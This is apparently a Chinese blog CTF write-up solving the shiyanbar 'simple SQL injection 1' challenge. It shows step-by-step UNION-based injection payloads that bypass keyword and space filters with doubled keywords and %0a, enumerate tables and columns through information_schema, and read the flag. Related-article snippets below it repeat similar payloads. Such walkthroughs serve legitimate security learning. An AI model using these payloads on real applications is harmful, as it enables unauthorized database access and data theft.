实验吧之简单的sql注入1

最新推荐文章于 2023-11-18 22:30:44 发布
最新推荐文章于 2023-11-18 22:30:44 发布
阅读量296 收藏
点赞数 1
分类专栏: CTF题 实验吧CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/85373652
版权

实验吧之简单的sql注入1

进来页面:
在这里插入图片描述
查找注入点!输入1’报错,存在注入
在这里插入图片描述
输入1’ select union 1发现报错
而且报错只输出一个1
怀疑是不是select和union被过滤掉了
在这里插入图片描述
输入’ununionion selectselect 1–发现
在这里插入图片描述
说明–也被吃掉了,而且后台对于union、select进行了处理,应该是将关键词和空格一起吃掉了。
输入’union%0aselect%0a1’发现:
ps:直接加在id=后面,输入框提交会报错,我也不知道为啥(流下了没有技术的泪水)。
在这里插入图片描述
初步注入成功!!
'union%0aselect%0agroupgroup_concat_concat(table_name)%0afrom%0ainformation_schema.tables%0awhere%0atable_schema=database()%0aand’1发现
在这里插入图片描述
where后面的都没了,是不是table_schema被过滤了,双写绕过试试。
ps:加在id=后面,提交还是报错,后面就直接加在id=后面了(又流下了没有技术的泪水)
在这里插入图片描述
看见有个flag的数据库
继续
结果发现这次过滤了很多的东西
直接输入
'union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand’1
得到:
在这里插入图片描述
接下来就是继续了
‘union%0aselect%0agroupgroup_concat_concat(columncolumn_name_name)%0afrom%0ainformationinformation_schema.columns_schema.columns%0awhere%0atabletable_schema_schema=database()%0aand%0atable_name=‘flag
得到:
在这里插入图片描述
最后输入1’%0aunion%0aselect%0aflag%0afrom%0aflag%0awhere%0a’1’='1
得到:在这里插入图片描述
得到flag。

A_dmins
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-实验简单sql注入
才不是小弱鸡的博客
05-07 1655
好吧,其实这题我也是看了wp才知道的写wp的老哥个个都是人才,脑洞很大,知识丰富,还会嘤嘤嘤,我超喜欢的。咳咳咳,跑题了,这题一看就是sql注入嘛(别问我为什么知道,自己看题目名)先进行过滤测试。先试试1 and 1=1,发现返回显然and被过滤了然后继续测试,结果发现sql语句基本上都被过滤了QAQ看wp发现这里其实是过滤后面带有空格的关键字了解这个就可以开始愉快的注入了先查一下数据库 1'/*...
简单sql注入1-3详解及相关阅读(实验吧)
zhy的博客
12-29 2220
题外话:更多关于信息安全、网络技术方面的东西,可以参考我的博客,也许你能找到你想看的? https://www.xiaozzz.xyz/ 1 简单Sql注入 类型:sql注入 题目链接: http://www.shiyanbar.com/ctf/1875 解题过程: 打开页面看到一个输入框和提交,先尝试输入一些简单的东西,发现输入1 2 3都是有结果的,输入4之后没有结果。 按照...
实验简单SQL注入1
writehawk的博客
03-19 177
解题链接: http://ctf5.shiyanbar.com/423/web/ 解题思路:一,   输入1,不报错;输入1',报错;输入1'',不报错。                  二 ,   输入1 and 1=1,返回1 1=1,可知,and被过滤了。                三,    输入1 union select,返回1 sel...
实验吧——(web)简单SQL注入1、2 writeup
qq_39480875的博客
05-22 506
判断注入类型 输入:1 输入:1’ 出现报错,初步猜测这是一个字符型的注入。 尝试一些基本的语句: 输入: 1' union select schema_name from information_schema.schemata where '1' ='1 又出现报错。union select被过滤 测试了几个关键词以后,发现都被过滤了 关键词被过滤:解决方法如下 1大小写交替: Ord...
一个简单的登陆案例模拟sql注入及Statement与PreparedStatement对比
浅时光|初如梦
06-15 516
1. sql注入 由于后台的sql是拼接而来,其中的参数是用户提交的,如果用户在提交参数时,参杂了一些sql的关键字或者特殊符号,可能会导致sql语义的改变,从而造成一些意外的操作。 2.Statement Statement主要用于执行静态sql语句,即内容固定不变的sql语句 Statement没执行一次都要对传入的sql语句编译一次,效率较差 某些情况下,sql语句只是其中的参数有所不同,其余子句完全相同,不适用于Statement 会被sql注入攻击 模拟sql 注入的代码实现如下:
SQL注入相关实验报告.doc
01-05
实验报告主要涉及两种SQL注入技术:REGXP正则匹配和基于时间的判断。 **一、REGXP正则匹配** 在实验中,攻击者利用正则表达式的特性来逐步揭示数据库信息。例如,通过`Limit 0,1`来获取单个字符,并结合正则递增...
SQL注入攻击实验报告
05-07
SQL注入攻击实验报告,自己写了试验的网站,举了一些基本的攻击和防御方法,有xp_cmdshell的执行,用的是sqlserver 2005
软件安全实验2 SQL注入实验
最新发布
06-19
分别是Brute Force(暴力破解)、Command Injection(命令行注入)、CSRF(跨站请求伪造)、File Inclusion(文件包含)、File Upload(文件上传)、Insecure CAPTCHA (不安全的验证码)、SQL Injection(SQL注入)...
人工智能实验SQL注入检测
01-15
在本实验“人工智能实验SQL注入检测”中,主要目标是构建一个分类器来识别和区分网络包中的正常访问和含有SQL注入攻击的情况。SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意SQL代码,试图...
SQL注入漏洞演示源代码
09-29
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的安全性。在这个"SQL注入漏洞演示源代码"中,我们可以深入理解这种攻击方式的工作原理,并学习如何防止它。 SQL注入是通过输入恶意的...
SQL注入1
qq_75005708的博客
11-18 276
2.还需要程序对提交数据获取方式是直接request("xxx")的方式,未指明使用request对象的具体方法进行获取,也就是说用request这个方法的时候获取的参数可以是是在URL后面的参数,也可以是cookie里面的参数,之后的原理就像我们的sql注入一样了。攻击者第一次输入的时候,后端代码对攻击者输入的参数进行了转义,但是在传入到数据库的时候的时候,没有进行转义,当攻击者再次读取到数据的时候,没有对数据库的字符进行转义,因此导致形成闭合。号可以执行输入的语句,因此造成堆叠注入。
SQL注入-显错注入
学习、分享、交流
05-13 4315
什么是SQL注入 : 用户输入的内容被浏览器当做数据库语句进行执行。 关键点:我们一定要输入[数据库语句] 。 我们输入【数据库语句】,如果这个网站执行了,就说明这个网站,存在数据库注入漏洞。
网络内生安全试验场-201909-SQL-wp
weixin_42444939的博客
09-19 325
fuzz发现几个重要过滤点 (包括 ’ , = , select , sleep 等) 以下为未过滤的sql注入关键词 那么现在来捋下思路,select被ban,意味着爆库名表名这条路走不通 考虑从爆password入手(当然,听学长说貌似也可以尝试堆叠,但我尝试后发现insert和sleep等被过滤,也就不再继续) 绕过细节: %20用/**/代替 substr和=的组合用regexp代替...
Excel 2010 SQL应用104 域聚合函数之DMIN,DMAX
复行数十步
03-18 384
目录 源数据表 解决方案 源数据表 营业厅名称 等级 性质 得分 蓓蕾营业厅 3级 城镇 80 桂城营业厅 3级 城镇 80 黄岗营业厅 3级 城镇 92 黄塘营业厅 2级 城镇 92 建设营业厅 3级 城镇 84 康城营业厅 3级 城镇 86 建设路专营店 3级 城镇 85 南兴二路营业厅 3级 城镇 93
实验吧web之简单sql注入1
The Road Of Sec
05-06 8495
0x.部分题解 一、通过加英文单引号1‘ ,检测到存在注入:   php?id=1   二、按常规步骤输入1 and 1=1和1 and 1=2的时候,发现报了“SQLi deteced!”而无法查询:php?1 and 1=1  php?1 and 1=2       那么,去掉空格输入1and1=1和1and1=2呢?       确定是过滤了空格!
简单sql注入之一 (实验吧)
wewww111的博客
08-11 3789
1.判断注入类型 1' or '1' = '1 结果如下 测试几个简单的语句后, 1' order by 1 # , 1' select 1 # 根据报错信息 #  -- - order by select 等关键词都被过滤 关键词被过滤:解决方法如下 1大小写交替: Order SeLect  2.双写  : OderOrder SelectSelect  3.交叉: sele...
实验简单sql注入解题思路
ZweLL032的博客
03-17 8286
解题思路:研究了好久,看了writeup才知道 1)在文本框输入1,提交,链接变成id=1 2)在文件框输入1‘,提交,报错,判断存在注入。3)初步预计后台表为flag,字段名为flag,需要构造union select flag from flag来执行。 4)根据第二步的报错信息看,多加个‘,后面的语句需要再构造一个条件来结束’,注入语句为:1‘ union select flag fro
SQL 注入-模拟操作
嘻哈熊的专栏
05-22 653
链接:https://jizhi.im/blog/post/sql_injection_intro 先来看一副很有意思的漫画: 相信大家对于学校们糟糕的网络环境和运维手段都早有体会,在此就不多做吐槽了。今天我们来聊一聊 SQL 注入相关的内容。 何谓 SQL 注入? SQL 注入是一种非常常见的数据库攻击手段,SQL 注入漏洞也是网络世界中最普遍的漏洞之一。大家也许都听过某某学长通过攻击学校数据库修改自己成绩的事情,这些学长们一般用的就是 SQL 注入方法。 SQL 注入其实就是恶意用户通过在表单中填.
实验吧---简单sql注入
mengtongxch的博客
10-19 503
通过注入获得flag值(提交格式:flag{})。 解题链接: http://ctf5.shiyanbar.com/423/web/ 首先呢点击这个链接,出现以下界面 当我们在框里面输入1,2,3的时候会出现一些东西,例如 用sqlmap扫描一下爆出其数据库,数据表,字段 参考网址:https://www.cnblogs.com/baifan261...
sqli-labs实验指导手册
11-17
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值